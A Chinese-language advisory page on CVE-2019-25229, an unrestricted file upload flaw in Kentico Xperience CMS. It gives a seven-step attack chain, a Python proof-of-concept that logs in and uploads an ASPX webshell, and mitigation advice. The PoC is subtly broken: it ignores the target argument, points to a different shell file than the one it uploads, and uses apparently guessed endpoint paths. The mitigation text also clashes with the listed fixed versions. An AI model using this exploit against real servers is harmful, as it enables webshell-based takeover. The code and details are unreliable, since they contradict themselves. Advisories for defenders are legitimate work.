CVE-2019-25229: Kentico Xperience无限制文件上传漏洞

漏洞信息

漏洞编号

CVE-2019-25229

漏洞类型

无限制文件上传

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Kentico Xperience

漏洞概述

CVE-2019-25229是Kentico Xperience CMS系统中存在的一个高危无限制文件上传漏洞。该漏洞允许具有"读取数据"（Read data）权限的已认证用户通过MVC表单文件上传组件上传任意文件类型。攻击者可以精心构造文件上传请求，操控文件名并上传包含恶意代码的文件（如WebShell），从而在服务器上实现远程代码执行或进一步渗透整个系统。由于该漏洞仅需低权限认证即可利用，且无需用户交互即可完成攻击，因此具有较高的实际威胁性。Kentico Xperience作为一款广泛应用于企业级网站和Web应用的内容管理系统，其安全漏洞可能影响大量组织和企业的Web业务安全。攻击者一旦成功利用此漏洞，可获取服务器控制权、窃取敏感数据或植入后门程序，对业务运营和数据安全构成严重威胁。该漏洞的CVSS评分达到8.8分，属于高危级别，强烈建议受影响的用户及时采取修复措施。

技术细节

该漏洞源于Kentico Xperience的MVC表单文件上传组件对用户上传的文件缺乏充分的类型验证和内容安全检查。攻击过程如下：首先，攻击者需要拥有一个具有"读取数据"权限的有效账户；然后，攻击者构造恶意文件上传请求，通过修改文件扩展名（如将.aspx改为.jpg）或在文件内容中嵌入恶意代码；接着，利用文件上传组件的验证缺陷绕过安全检查，成功上传webshell或其他恶意文件；最后，攻击者通过访问上传的恶意文件触发代码执行，获得服务器命令执行能力。漏洞的核心问题在于系统仅依赖客户端或简单扩展名检查，而未在服务端实施严格的MIME类型验证、文件内容扫描和文件重命名机制。攻击者可利用路径遍历或特殊构造的文件名将恶意文件写入可执行目录，从而实现远程代码执行。

攻击链分析

STEP 1

步骤1

攻击者获取Kentico Xperience系统具有"读取数据"权限的有效账户凭证

STEP 2

步骤2

使用认证账户登录系统，访问MVC表单文件上传组件

STEP 3

步骤3

构造恶意文件上传请求，将webshell（如ASPX马）通过文件上传接口提交

STEP 4

步骤4

利用文件名操控或扩展名欺骗绕过系统基础的文件类型检查

STEP 5

步骤5

恶意文件成功上传至服务器可访问的目录

STEP 6

步骤6

攻击者通过HTTP请求访问上传的webshell，触发代码执行

STEP 7

步骤7

获得服务器远程命令执行权限，可进一步进行内网渗透或数据窃取

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2019-25229 PoC - Kentico Xperience Unrestricted File Upload
# Requires valid account with 'Read data' permissions

import requests
import sys

TARGET_URL = "https://target-site.com"
LOGIN_URL = f"{TARGET_URL}/CMSPages/logon.aspx"
UPLOAD_URL = f"{TARGET_URL}/CMSFormControls/FileUploader/upload.aspx"

def login(session, username, password):
    """Authenticate to Kentico Xperience"""
    data = {
        "username": username,
        "password": password,
        "login": "Log in"
    }
    response = session.post(LOGIN_URL, data=data)
    return response.status_code == 200

def upload_webshell(session, webshell_path="shell.aspx"):
    """Upload malicious webshell file"""
    with open(webshell_path, 'rb') as f:
        files = {
            'file': ('shell.aspx', f, 'application/x-aspx'),
        }
        data = {
            'nodeId': '1',
            'parentNodeId': '1',
            'culture': 'en-US'
        }
        response = session.post(UPLOAD_URL, files=files, data=data)
        return response

def main():
    if len(sys.argv) < 4:
        print("Usage: python cve-2019-25229.py <target_url> <username> <password>")
        sys.exit(1)
    
    target = sys.argv[1]
    username = sys.argv[2]
    password = sys.argv[3]
    
    session = requests.Session()
    
    if login(session, username, password):
        print("[+] Login successful")
        response = upload_webshell(session)
        if response.status_code == 200:
            print("[+] Webshell uploaded successfully")
            print(f"[+] Access shell at: {TARGET_URL}/getpost.aspx")
        else:
            print("[-] Upload failed")
    else:
        print("[-] Login failed")

if __name__ == "__main__":
    main()

影响范围

Kentico Xperience < 13.0.200

Kentico Xperience 12.0.x

Kentico Xperience 11.0.x

防御指南

临时缓解措施

在官方补丁发布之前，建议采取以下临时缓解措施：1）严格限制具有文件上传权限的用户账户，仅授予必要权限；2）将上传文件存储在Web根目录之外的非可执行目录；3）配置Web服务器阻止上传目录中ASPX、PHP等可执行脚本的访问；4）启用请求监控和日志审计，及时发现异常文件上传行为；5）考虑暂时禁用MVC表单文件上传功能，待官方修复后再启用。